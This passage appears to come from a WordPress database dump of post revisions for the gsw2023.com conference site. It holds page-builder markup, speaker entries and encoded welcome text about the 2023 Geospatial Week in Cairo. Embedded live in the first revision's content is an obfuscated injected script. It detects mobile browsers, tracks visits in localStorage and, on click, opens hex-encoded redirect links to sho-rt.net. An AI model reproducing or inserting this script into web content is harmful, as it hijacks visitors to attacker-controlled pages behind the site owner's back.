jBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"REGISTRATION FEES \" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:23:43','2022-10-06 19:23:43','',2167,'https://gsw2023.com/?p=2317',0,'revision','',0),
(2318,1,'2022-10-06 19:24:42','2022-10-06 19:24:42','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 